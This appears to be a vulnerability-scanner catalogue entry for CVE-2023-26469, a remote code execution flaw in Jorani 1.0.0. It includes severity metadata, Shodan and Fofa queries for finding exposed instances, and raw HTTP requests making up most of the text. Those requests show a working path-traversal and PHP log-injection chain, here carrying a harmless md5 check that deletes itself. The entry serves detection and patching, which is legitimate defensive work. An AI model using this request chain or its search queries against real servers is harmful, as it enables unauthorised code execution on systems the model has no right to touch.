| Title | Jorani 1.0.0 - Remote Code Execution |
|---|---|
| Author | pussycat0x |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. |
| Remediation | Upgrade Jorani to a patched version or apply the necessary security patches. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93246 |
| CVE ID | CVE-2023-26469 |
| CWE ID | CWE-22 |
| Shodan Query | http.favicon.hash:-2032163853 |
| Fofa Query | icon_hash=-2032163853 |
| Tags | cve2023 cve jorani rce packetstorm vkev vuln |
Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
GET /session/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Connection: close
Accept-Encoding: gzip
POST /session/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Connection: close
Content-Length: 217
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
csrf_test_jorani=QT0JYd&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_AVORESNCQOU2'])){echo md5('CVE-2023-26469');unlink(__FILE__);} ?>&CipheredValue=DummyPassword
GET /pages/view/log-2026-01-14 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Connection: close
AVORESNCQOU2: CVE-2023-26469
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-26469.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-26469.pcap
N/AN/A